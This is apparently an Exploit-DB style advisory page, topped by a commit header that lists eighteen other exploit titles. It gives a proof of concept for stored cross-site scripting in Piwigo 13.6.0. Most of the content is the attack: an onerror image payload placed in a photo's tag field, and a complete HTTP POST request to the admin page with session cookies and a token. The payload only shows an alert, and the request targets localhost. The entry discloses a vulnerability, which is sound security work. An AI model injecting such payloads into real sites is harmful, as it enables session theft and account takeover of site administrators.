bd09027499
18 changes to exploits/shellcodes/ghdb Franklin Fueling Systems TS-550 - Default Password Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information Linux Kernel 6.2 - Userspace Processes To Enable Mitigation Microsoft Word 16.72.23040900 - Remote Code Execution (RCE) Bang Resto v1.0 - 'Multiple' SQL Injection Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) Chitor-CMS v1.1.2 - Pre-Auth SQL Injection GDidees CMS 3.9.1 - Local File Disclosure Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE) Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS) ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE) Serendipity 2.4.0 - Cross-Site Scripting (XSS) Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated) FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE) AspEmail v5.6.0.2 - Local Privilege Escalation File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
43 lines
No EOL
1.7 KiB
Text
43 lines
No EOL
1.7 KiB
Text
Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
|
|
Application: Piwigo
|
|
Version: 13.6.0
|
|
Bugs: Stored XSS
|
|
Technology: PHP
|
|
Vendor URL: https://piwigo.org/
|
|
Software Link: https://piwigo.org/get-piwigo
|
|
Date of found: 18.04.2023
|
|
Author: Mirabbas Ağalarov
|
|
Tested on: Linux
|
|
|
|
|
|
2. Technical Details & POC
|
|
========================================
|
|
steps:
|
|
|
|
1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image)
|
|
payload: <img%20src=x%20onerror=alert(4)>
|
|
|
|
|
|
POST /piwigo/admin.php?page=photo-9 HTTP/1.1
|
|
Host: localhost
|
|
Content-Length: 159
|
|
Cache-Control: max-age=0
|
|
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
|
|
sec-ch-ua-mobile: ?0
|
|
sec-ch-ua-platform: "Linux"
|
|
Upgrade-Insecure-Requests: 1
|
|
Origin: http://localhost
|
|
Content-Type: application/x-www-form-urlencoded
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-User: ?1
|
|
Sec-Fetch-Dest: document
|
|
Referer: http://localhost/piwigo/admin.php?page=photo-9
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe
|
|
Connection: close
|
|
|
|
name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings |